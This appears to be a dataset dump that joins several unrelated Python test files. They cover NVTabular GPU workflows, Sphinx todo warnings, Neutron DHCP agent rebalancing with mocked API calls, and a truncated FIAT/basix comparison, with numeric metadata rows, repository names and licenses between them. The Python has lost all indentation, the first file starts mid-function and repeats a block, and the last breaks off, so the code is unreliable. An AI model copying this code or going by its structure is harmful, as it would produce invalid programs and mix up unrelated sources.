for chunk in data_itr_2:
df_pp = cudf.concat([df_pp, chunk], axis=0) if df_pp else chunk
if engine == "parquet":
assert df_pp["name-cat"].dtype == "int64"
assert df_pp["name-string"].dtype == "int64"
num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
assert num_rows == len(df_pp)
return processor.ds_exports
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
@pytest.mark.parametrize("replace", [True, False])
def test_gpu_workflow_config(tmpdir, datasets, dump, gpu_memory_frac, engine, replace):
paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
if engine == "parquet":
df1 = cudf.read_parquet(paths[0])[mycols_pq]
df2 = cudf.read_parquet(paths[1])[mycols_pq]
else:
df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
df = cudf.concat([df1, df2], axis=0)
df["id"] = df["id"].astype("int64")
if engine == "parquet":
cat_names = ["name-cat", "name-string"]
columns = mycols_pq
else:
cat_names = ["name-string"]
columns = mycols_csv
cont_names = ["x", "y", "id"]
label_name = ["label"]
config = nvt.workflow.get_new_config()
# add operators with dependencies
config["FE"]["continuous"] = [[ops.FillMissing(replace=replace), ops.LogOp()]]
config["PP"]["continuous"] = [[ops.LogOp(replace=replace), ops.Normalize()]]
config["PP"]["categorical"] = [ops.Categorify()]
processor = nvt.Workflow(
cat_names=cat_names,
cont_names=cont_names,
label_name=label_name,
config=config,
to_cpu=False,
)
data_itr = nvt.io.GPUDatasetIterator(
paths,
columns=columns,
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
names=allcols_csv,
)
processor.update_stats(data_itr)
if dump:
config_file = tmpdir + "/temp.yaml"
processor.save_stats(config_file)
processor.clear_stats()
processor.load_stats(config_file)
def get_norms(tar: cudf.Series):
ser_median = tar.dropna().quantile(0.5, interpolation="linear")
gdf = tar.fillna(ser_median)
gdf = np.log(gdf + 1)
return gdf
# Check mean and std - No good right now we have to add all other changes; Zerofill, Log
concat_ops = "_FillMissing_LogOp"
if replace:
concat_ops = ""
assert math.isclose(
get_norms(df.x).mean(), processor.stats["means"]["x" + concat_ops], rel_tol=1e-1,
)
assert math.isclose(
get_norms(df.y).mean(), processor.stats["means"]["y" + concat_ops], rel_tol=1e-1,
)
assert math.isclose(
get_norms(df.x).std(), processor.stats["stds"]["x" + concat_ops], rel_tol=1e-1,
)
assert math.isclose(
get_norms(df.y).std(), processor.stats["stds"]["y" + concat_ops], rel_tol=1e-1,
)
# Check that categories match
if engine == "parquet":
cats_expected0 = df["name-cat"].unique().values_to_string()
cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats0 == ["None"] + cats_expected0
cats_expected1 = df["name-string"].unique().values_to_string()
cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats1 == ["None"] + cats_expected1
# Write to new "shuffled" and "processed" dataset
processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
data_itr_2 = nvtabular.io.GPUDatasetIterator(
glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
)
df_pp = None
for chunk in data_itr_2:
df_pp = cudf.concat([df_pp, chunk], axis=0) if df_pp else chunk
if engine == "parquet":
assert df_pp["name-cat"].dtype == "int64"
assert df_pp["name-string"].dtype == "int64"
num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
assert num_rows == len(df_pp)
return processor.ds_exports
| 38.444169
| 99
| 0.661718
| 2,197
| 15,493
| 4.461538
| 0.111971
| 0.016425
| 0.029178
| 0.028566
| 0.860845
| 0.85503
| 0.843705
| 0.831055
| 0.827484
| 0.827484
| 0
| 0.017415
| 0.192022
| 15,493
| 402
| 100
| 38.539801
| 0.765618
| 0.104241
| 0
| 0.754153
| 0
| 0
| 0.079318
| 0
| 0
| 0
| 0
| 0
| 0.106312
| 1
| 0.033223
| false
| 0
| 0.033223
| 0
| 0.086379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77d657adc73f4c65d2612ed1b1c32f0531117b2b
| 2,781
|
py
|
Python
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2021-11-06T17:09:04.000Z
|
2021-11-06T17:09:04.000Z
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2017-07-15T22:46:50.000Z
|
2017-07-15T22:46:50.000Z
|
tests/test_ext_todo.py
|
hio/sphinx
|
cb0220de1a0d8acd00292b898d2ef03b588179b0
|
[
"BSD-2-Clause"
] | 1
|
2021-11-06T17:08:54.000Z
|
2021-11-06T17:08:54.000Z
|
# -*- coding: utf-8 -*-
"""
test_ext_todo
~~~~~~~~~~~~~
Test sphinx.ext.todo extension.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import pytest
@pytest.mark.sphinx('html', testroot='ext-todo', freshenv=True,
confoverrides={'todo_include_todos': True, 'todo_emit_warnings': True})
def test_todo(app, status, warning):
todos = []
def on_todo_defined(app, node):
todos.append(node)
app.connect('todo-defined', on_todo_defined)
app.builder.build_all()
# check todolist
content = (app.outdir / 'index.html').text()
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in foo</p>')
assert re.search(html, content, re.S)
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in bar</p>')
assert re.search(html, content, re.S)
# check todo
content = (app.outdir / 'foo.html').text()
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in foo</p>')
assert re.search(html, content, re.S)
# check emitted warnings
assert 'WARNING: TODO entry found: todo in foo' in warning.getvalue()
assert 'WARNING: TODO entry found: todo in bar' in warning.getvalue()
# check handled event
assert len(todos) == 2
assert set(todo[1].astext() for todo in todos) == set(['todo in foo', 'todo in bar'])
@pytest.mark.sphinx('html', testroot='ext-todo', freshenv=True,
confoverrides={'todo_include_todos': False, 'todo_emit_warnings': True})
def test_todo_not_included(app, status, warning):
todos = []
def on_todo_defined(app, node):
todos.append(node)
app.connect('todo-defined', on_todo_defined)
app.builder.build_all()
# check todolist
content = (app.outdir / 'index.html').text()
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in foo</p>')
assert not re.search(html, content, re.S)
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in bar</p>')
assert not re.search(html, content, re.S)
# check todo
content = (app.outdir / 'foo.html').text()
html = ('<p class="first admonition-title">Todo</p>\n'
'<p class="last">todo in foo</p>')
assert not re.search(html, content, re.S)
# check emitted warnings
assert 'WARNING: TODO entry found: todo in foo' in warning.getvalue()
assert 'WARNING: TODO entry found: todo in bar' in warning.getvalue()
# check handled event
assert len(todos) == 2
assert set(todo[1].astext() for todo in todos) == set(['todo in foo', 'todo in bar'])
| 31.965517
| 92
| 0.619561
| 392
| 2,781
| 4.334184
| 0.19898
| 0.056504
| 0.042378
| 0.052972
| 0.901118
| 0.901118
| 0.901118
| 0.864626
| 0.864626
| 0.864626
| 0
| 0.005977
| 0.217907
| 2,781
| 86
| 93
| 32.337209
| 0.775172
| 0.117584
| 0
| 0.875
| 0
| 0
| 0.331679
| 0.069479
| 0
| 0
| 0
| 0.034884
| 0.291667
| 1
| 0.083333
| false
| 0
| 0.041667
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb0c78b0fa58e2b62baa40084631715cc2e02f86
| 114
|
py
|
Python
|
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | null | null | null |
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | null | null | null |
services/transactionservice/exception.py
|
autokrator-uog/backend
|
0a2d46f9b52465ed8dfc9234858d6a93f3754c05
|
[
"MIT"
] | 1
|
2019-06-09T23:51:13.000Z
|
2019-06-09T23:51:13.000Z
|
from services.exceptions import ServiceException
class TransactionServiceException(ServiceException):
pass
| 16.285714
| 52
| 0.842105
| 9
| 114
| 10.666667
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122807
| 114
| 6
| 53
| 19
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
bb3548db62d0b18824e6b9d4bdda8afec6db619a
| 24,166
|
py
|
Python
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2020-02-07T19:01:36.000Z
|
2022-02-23T01:41:46.000Z
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 1
|
2021-01-14T12:02:25.000Z
|
2021-01-14T12:02:25.000Z
|
nfv/nfv-tests/nfv_unit_tests/tests/test_dhcp_network_rebalance_randomized.py
|
SidneyAn/nfv
|
5f0262a5b6ea4be59f977b9c587c483cbe0e373d
|
[
"Apache-2.0"
] | 2
|
2021-01-13T08:39:21.000Z
|
2022-02-09T00:21:55.000Z
|
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import mock
import random
from nfv_vim.network_rebalance._dhcp_rebalance import _add_network_to_dhcp_agent_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _DHCPRebalance
from nfv_vim.network_rebalance._dhcp_rebalance import _get_datanetworks_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _get_dhcp_agent_networks_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _get_network_agents_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _remove_network_from_dhcp_agent_callback_body # noqa: H501
from nfv_vim.network_rebalance._dhcp_rebalance import _run_state_machine
from nfv_vim.network_rebalance._dhcp_rebalance import add_rebalance_work_dhcp
from nfv_vim.network_rebalance._dhcp_rebalance import DHCP_REBALANCE_STATE
from . import testcase # noqa: H304
from . import utils # noqa: H304
DEBUG_PRINTING = False
# DEBUG_PRINTING = True
_fake_host_table = dict()
class _fake_host(object):
def __init__(self, uuid):
self.uuid = uuid
MAX_AGENTS = 40
MAX_NETWORKS = 200
MAX_LOOPCOUNT = 2 * MAX_AGENTS * MAX_NETWORKS
def build_get_agents_response():
get_agents_response = dict()
get_agents_response['completed'] = True
get_agents_response['reason'] = ''
get_agents_response['result-data'] = list()
NUM_AGENTS = random.randint(2, MAX_AGENTS - 1)
for x in range(0, NUM_AGENTS):
host_name = "compute-" + str(x)
admin_state_up = True
# randomly set admin_state_up on some agents to False
admin_state_down = random.randint(0, 5)
if admin_state_down == 0:
admin_state_up = False
get_agents_response_entry = \
{"host": host_name, "agent_type": "DHCP agent",
"id": host_name + "_id", "alive": True,
"admin_state_up": admin_state_up}
get_agents_response['result-data'].append(get_agents_response_entry)
add_to_fake_host_table(host_name)
return get_agents_response
def build_get_dhcp_agent_networks_response(agent_id,
use_strange_networks=False):
get_dhcp_agent_networks_response = dict()
get_dhcp_agent_networks_response['completed'] = True
get_dhcp_agent_networks_response['reason'] = ''
get_dhcp_agent_networks_response['result-data'] = list()
for x in range(0, random.randint(0, MAX_NETWORKS - 1)):
host_name = "compute-" + str(x)
net_idx = 0
net = "physnet0"
if use_strange_networks:
net_idx = random.randint(0, 3)
if net_idx > 0:
net = "physnet3"
get_dhcp_agent_networks_response_entry = \
{"id": agent_id + "_network_" + str(x),
"provider:physical_network": net}
get_dhcp_agent_networks_response['result-data'].append(
get_dhcp_agent_networks_response_entry)
return get_dhcp_agent_networks_response
def build_get_datanetworks_response(host_id):
get_datanetworks_response = dict()
get_datanetworks_response['completed'] = True
get_datanetworks_response['reason'] = ''
get_datanetworks_response['result-data'] = list()
get_datanetworks_response['result-data'].append(
{u'datanetwork_name': u'physnet0'})
get_datanetworks_response['result-data'].append(
{u'datanetwork_name': u'physnet1'})
return get_datanetworks_response
dlog_local = utils.dlog(DEBUG_PRINTING)
def fake_nfvi_get_network_agents(a):
response = build_get_agents_response()
if DEBUG_PRINTING:
print("fake_nfvi_get_network_agents")
print("response = %s" % response)
_get_network_agents_callback_body(response)
def fake_nfvi_get_dhcp_agent_networks_strange_nets(agent_id, b):
response = build_get_dhcp_agent_networks_response(agent_id, True)
if DEBUG_PRINTING:
print("fake_nfvi_get_dhcp_agent_networks_strange_nets")
print("agent_id = %s" % agent_id)
print("response = %s" % response)
_get_dhcp_agent_networks_callback_body(agent_id, response)
def fake_nfvi_get_dhcp_agent_networks(agent_id, b):
response = build_get_dhcp_agent_networks_response(agent_id)
if DEBUG_PRINTING:
print("fake_nfvi_get_dhcp_agent_networks")
print("agent_id = %s" % agent_id)
print("response = %s" % response)
_get_dhcp_agent_networks_callback_body(agent_id, response)
def fake_nfvi_get_datanetworks(host_id, b):
response = build_get_datanetworks_response(host_id)
if DEBUG_PRINTING:
print("fake_nfvi_get_datanetworks")
print("response = %s" % response)
_get_datanetworks_callback_body(host_id, response)
def fake_nfvi_remove_network_from_dhcp_agent(a, b, c):
response = dict()
response['completed'] = True
response['reason'] = ''
if DEBUG_PRINTING:
print("fake_nfvi_remove_network_from_dhcp_agent")
print("response = %s" % response)
_remove_network_from_dhcp_agent_callback_body(a, b, response)
def fake_nfvi_add_network_to_dhcp_agent(a, b, c):
response = dict()
response['completed'] = True
response['reason'] = ''
if DEBUG_PRINTING:
print("fake_nfvi_add_network_to_dhcp_agent")
print("response = %s" % response)
_add_network_to_dhcp_agent_callback_body(response)
def fake_tables_get_host_table():
return _fake_host_table
def add_to_fake_host_table(host_name):
_fake_host_table[host_name] = _fake_host(host_name + "_uuid")
@mock.patch('nfv_vim.network_rebalance._dhcp_rebalance.DLOG',
dlog_local)
@mock.patch('nfv_vim.nfvi.nfvi_remove_network_from_dhcp_agent',
fake_nfvi_remove_network_from_dhcp_agent)
@mock.patch('nfv_vim.nfvi.nfvi_get_network_agents',
fake_nfvi_get_network_agents)
@mock.patch('nfv_vim.nfvi.nfvi_get_datanetworks',
fake_nfvi_get_datanetworks)
@mock.patch('nfv_vim.nfvi.nfvi_remove_network_from_dhcp_agent',
fake_nfvi_remove_network_from_dhcp_agent)
@mock.patch('nfv_vim.nfvi.nfvi_add_network_to_dhcp_agent',
fake_nfvi_add_network_to_dhcp_agent)
@mock.patch('nfv_vim.tables.tables_get_host_table',
fake_tables_get_host_table)
class TestNeutronDHCPRebalance(testcase.NFVTestCase):
def setUp(self):
super(TestNeutronDHCPRebalance, self).setUp()
def tearDown(self):
super(TestNeutronDHCPRebalance, self).tearDown()
@mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
fake_nfvi_get_dhcp_agent_networks)
def test_rebalance_down_host_randomized_w_api_calls(self):
initial_network_count = 0
initial_network_config = list()
for x in range(1, 200):
_DHCPRebalance.network_diff_threshold = random.randint(1, 4)
add_rebalance_work_dhcp('compute-0', True)
loopcount = 0
if DEBUG_PRINTING:
print("HOST DOWN TEST NUMBER %s" % str(x))
while True:
loopcount += 1
old_state = _DHCPRebalance.get_state()
_run_state_machine()
new_state = _DHCPRebalance.get_state()
if ((old_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
(new_state ==
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS)):
for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
initial_network_config.append(
_DHCPRebalance.num_networks_on_agents[idx])
initial_network_count = \
sum(_DHCPRebalance.num_networks_on_agents)
if (_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and \
(len(_DHCPRebalance.host_down_queue) == 0):
final_network_count = \
sum(_DHCPRebalance.num_networks_on_agents)
if DEBUG_PRINTING:
print("network_diff_threshold: %s" %
_DHCPRebalance.network_diff_threshold)
print("initial_network_count: %s, "
"final_network_count: %s" %
(initial_network_count, final_network_count))
print("initial num_networks_on_agents: %s, "
"final num_networks_on_agents: %s" %
(initial_network_config,
_DHCPRebalance.num_networks_on_agents))
del initial_network_config[:]
if len(_DHCPRebalance.num_networks_on_agents) > 2:
num_networks_length = \
len(_DHCPRebalance.num_networks_on_agents)
assert ((num_networks_length == 0) or
_DHCPRebalance.num_networks_on_agents[0] == 0)
assert (initial_network_count == final_network_count)
else:
if DEBUG_PRINTING:
print("less than 2 agents, nothing to do")
break
if loopcount >= MAX_LOOPCOUNT:
print("Loopcount exit!!! loopcount:%s" % loopcount)
assert loopcount < MAX_LOOPCOUNT
@mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
fake_nfvi_get_dhcp_agent_networks)
def test_rebalance_down_host_abort_w_api_calls(self):
initial_network_count = 0
initial_network_config = list()
abort_state_list = [DHCP_REBALANCE_STATE.GET_DHCP_AGENTS,
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT,
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS,
DHCP_REBALANCE_STATE.RESCHEDULE_DOWN_AGENT,
DHCP_REBALANCE_STATE.HOLD_OFF,
DHCP_REBALANCE_STATE.DONE]
for x in range(1, 200):
_DHCPRebalance.network_diff_threshold = random.randint(1, 4)
add_rebalance_work_dhcp('compute-0', True)
loopcount = 0
if DEBUG_PRINTING:
print("HOST DOWN TEST NUMBER %s" % str(x))
aborted = False
doing_abort = False
abort_state = random.randint(0, len(abort_state_list) - 1)
while True:
loopcount += 1
old_state = _DHCPRebalance.get_state()
if old_state == (abort_state_list[abort_state]) and (not aborted):
aborted = True
doing_abort = True
add_rebalance_work_dhcp('compute-1', True)
if DEBUG_PRINTING:
print("host-down adding compute-1 down in state: %s." %
old_state)
_run_state_machine()
new_state = _DHCPRebalance.get_state()
if doing_abort:
doing_abort = False
if (old_state != DHCP_REBALANCE_STATE.DONE) and \
(old_state != DHCP_REBALANCE_STATE.HOLD_OFF):
if _DHCPRebalance.num_dhcp_agents < 2:
assert(new_state == DHCP_REBALANCE_STATE.DONE)
else:
assert(new_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT)
if ((old_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
(new_state ==
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS)):
for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
initial_network_config.append(
_DHCPRebalance.num_networks_on_agents[idx])
initial_network_count = \
sum(_DHCPRebalance.num_networks_on_agents)
if (_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and \
(len(_DHCPRebalance.host_down_queue) == 0):
final_network_count = \
sum(_DHCPRebalance.num_networks_on_agents)
if DEBUG_PRINTING:
print("network_diff_threshold: %s" %
_DHCPRebalance.network_diff_threshold)
print("initial_network_count: %s, "
"final_network_count: %s" %
(initial_network_count, final_network_count))
print("initial num_networks_on_agents: %s, "
"final num_networks_on_agents: %s" %
(initial_network_config,
_DHCPRebalance.num_networks_on_agents))
del initial_network_config[:]
if len(_DHCPRebalance.num_networks_on_agents) > 2:
num_networks_length = \
len(_DHCPRebalance.num_networks_on_agents)
assert ((num_networks_length == 0) or
_DHCPRebalance.num_networks_on_agents[0] == 0)
assert (initial_network_count == final_network_count)
else:
if DEBUG_PRINTING:
print("less than 2 agents, nothing to do")
break
if loopcount >= MAX_LOOPCOUNT:
print("Loopcount exit!!! loopcount:%s" % loopcount)
assert loopcount < MAX_LOOPCOUNT
@mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
fake_nfvi_get_dhcp_agent_networks)
def test_rebalance_up_host_abort_randomized_w_api_calls(self):
initial_network_count = 0
initial_network_config = list()
abort_state_list = [DHCP_REBALANCE_STATE.GET_DHCP_AGENTS,
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT,
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS,
DHCP_REBALANCE_STATE.RESCHEDULE_NEW_AGENT,
DHCP_REBALANCE_STATE.HOLD_OFF,
DHCP_REBALANCE_STATE.DONE]
for x in range(1, 200):
_DHCPRebalance.network_diff_threshold = random.randint(1, 4)
add_rebalance_work_dhcp('compute-0', False)
aborted = False
doing_abort = False
abort_state = random.randint(0, len(abort_state_list) - 1)
loopcount = 0
if DEBUG_PRINTING:
print("HOST UP TEST NUMBER %s" % str(x))
while True:
loopcount += 1
old_state = _DHCPRebalance.get_state()
if old_state == (abort_state_list[abort_state]) and (not aborted):
aborted = True
doing_abort = True
add_rebalance_work_dhcp('compute-1', True)
if DEBUG_PRINTING:
print("host-up adding compute-1 down in state: %s." %
old_state)
_run_state_machine()
new_state = _DHCPRebalance.get_state()
if doing_abort:
doing_abort = False
if (old_state != DHCP_REBALANCE_STATE.DONE) and \
(old_state != DHCP_REBALANCE_STATE.HOLD_OFF):
assert(new_state ==
DHCP_REBALANCE_STATE.HOLD_OFF)
if ((old_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
((new_state ==
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
(new_state == DHCP_REBALANCE_STATE.DONE))):
# new_state DONE is for already balanced case
for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
initial_network_config.append(
_DHCPRebalance.num_networks_on_agents[idx])
initial_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
(len(_DHCPRebalance.host_up_queue) == 0) and
(len(_DHCPRebalance.host_down_queue) == 0)):
final_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if DEBUG_PRINTING:
print("network_diff_threshold: %s" %
_DHCPRebalance.network_diff_threshold)
print("initial_network_count: %s, "
"final_network_count: %s" %
(initial_network_count, final_network_count))
print("initial num_networks_on_agents: %s, "
"final num_networks_on_agents: %s" %
(initial_network_config,
_DHCPRebalance.num_networks_on_agents))
del initial_network_config[:]
if len(_DHCPRebalance.num_networks_on_agents) > 2:
assert (initial_network_count == final_network_count)
assert (max(_DHCPRebalance.num_networks_on_agents) -
min(_DHCPRebalance.num_networks_on_agents) <=
_DHCPRebalance.network_diff_threshold)
else:
if DEBUG_PRINTING:
print("less than 2 agents, nothing to do")
break
if loopcount >= MAX_LOOPCOUNT:
print("Loopcount exit!!! loopcount:%s" % loopcount)
assert loopcount < MAX_LOOPCOUNT
@mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
fake_nfvi_get_dhcp_agent_networks)
def test_rebalance_up_host_randomized_w_api_calls(self):
initial_network_count = 0
initial_network_config = list()
for x in range(1, 200):
_DHCPRebalance.network_diff_threshold = random.randint(1, 4)
add_rebalance_work_dhcp('compute-0', False)
loopcount = 0
if DEBUG_PRINTING:
print("HOST UP TEST NUMBER %s" % str(x))
while True:
loopcount += 1
old_state = _DHCPRebalance.get_state()
_run_state_machine()
new_state = _DHCPRebalance.get_state()
if ((old_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
((new_state ==
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
(new_state == DHCP_REBALANCE_STATE.DONE))):
# new_state DONE is for already balanced case
for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
initial_network_config.append(
_DHCPRebalance.num_networks_on_agents[idx])
initial_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
(len(_DHCPRebalance.host_up_queue) == 0)):
final_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if DEBUG_PRINTING:
print("network_diff_threshold: %s" %
_DHCPRebalance.network_diff_threshold)
print("initial_network_count: %s, "
"final_network_count: %s" %
(initial_network_count, final_network_count))
print("initial num_networks_on_agents: %s, "
"final num_networks_on_agents: %s" %
(initial_network_config,
_DHCPRebalance.num_networks_on_agents))
del initial_network_config[:]
if len(_DHCPRebalance.num_networks_on_agents) > 2:
assert (initial_network_count == final_network_count)
assert (max(_DHCPRebalance.num_networks_on_agents) -
min(_DHCPRebalance.num_networks_on_agents) <=
_DHCPRebalance.network_diff_threshold)
else:
if DEBUG_PRINTING:
print("less than 2 agents, nothing to do")
break
if loopcount >= MAX_LOOPCOUNT:
print("Loopcount exit!!! loopcount:%s" % loopcount)
assert loopcount < MAX_LOOPCOUNT
@mock.patch('nfv_vim.nfvi.nfvi_get_dhcp_agent_networks',
fake_nfvi_get_dhcp_agent_networks_strange_nets)
def test_rebalance_up_strange_networks(self):
initial_network_count = 0
initial_network_config = list()
for x in range(1, 200):
_DHCPRebalance.network_diff_threshold = random.randint(1, 4)
add_rebalance_work_dhcp('compute-0', False)
loopcount = 0
if DEBUG_PRINTING:
print("HOST UP TEST NUMBER %s" % str(x))
while True:
loopcount += 1
old_state = _DHCPRebalance.get_state()
_run_state_machine()
new_state = _DHCPRebalance.get_state()
if ((old_state ==
DHCP_REBALANCE_STATE.GET_NETWORKS_HOSTED_ON_AGENT) and
((new_state ==
DHCP_REBALANCE_STATE.GET_HOST_PHYSICAL_NETWORKS) or
(new_state == DHCP_REBALANCE_STATE.DONE))):
# new_state DONE is for already balanced case
for idx in range(len(_DHCPRebalance.num_networks_on_agents)):
initial_network_config.append(
_DHCPRebalance.num_networks_on_agents[idx])
initial_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if ((_DHCPRebalance.get_state() == DHCP_REBALANCE_STATE.DONE) and
(len(_DHCPRebalance.host_up_queue) == 0)):
final_network_count = sum(
_DHCPRebalance.num_networks_on_agents)
if DEBUG_PRINTING:
print("network_diff_threshold: %s" %
_DHCPRebalance.network_diff_threshold)
print("initial_network_count: %s, "
"final_network_count: %s" %
(initial_network_count, final_network_count))
print("initial num_networks_on_agents: %s, "
"final num_networks_on_agents: %s" %
(initial_network_config,
_DHCPRebalance.num_networks_on_agents))
del initial_network_config[:]
if len(_DHCPRebalance.num_networks_on_agents) > 2:
assert (initial_network_count == final_network_count)
else:
if DEBUG_PRINTING:
print("less than 2 agents, nothing to do")
break
if loopcount >= MAX_LOOPCOUNT:
print("Loopcount exit!!! loopcount:%s" % loopcount)
assert loopcount < MAX_LOOPCOUNT
| 44.422794
| 113
| 0.578788
| 2,528
| 24,166
| 5.060522
| 0.065665
| 0.044712
| 0.048777
| 0.071289
| 0.873368
| 0.833346
| 0.80802
| 0.771516
| 0.755335
| 0.740405
| 0
| 0.008599
| 0.350368
| 24,166
| 543
| 114
| 44.504604
| 0.806293
| 0.015187
| 0
| 0.726457
| 0
| 0
| 0.10214
| 0.049788
| 0
| 0
| 0
| 0
| 0.038117
| 1
| 0.042601
| false
| 0
| 0.029148
| 0.002242
| 0.085202
| 0.103139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24c1611855efbd98b359b222c429ff1ffd837712
| 4,567
|
py
|
Python
|
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
test/xtest_fiat.py
|
nikhilTkur/basix
|
62b1a3b903f1aabbe207e848595432d5a2da0dba
|
[
"MIT"
] | null | null | null |
import FIAT
import basix
import pytest
import numpy as np
"""
Some tests against FIAT. Some may fail due to issues in FIAT
(e.g. normalisation of orthonormal polynomial sets when n=0)
"""
@pytest.mark.parametrize("order", [1, 2, 3, 4])
def test_triangle(order):
nderivs = 2
cell = FIAT.ufc_simplex(2)
L = FIAT.Lagrange(cell, order)
cell_type = basix.CellType.triangle
pts = basix.create_lattice(cell_type, 3, True)
tab_fiat = L.tabulate(nderivs, pts)
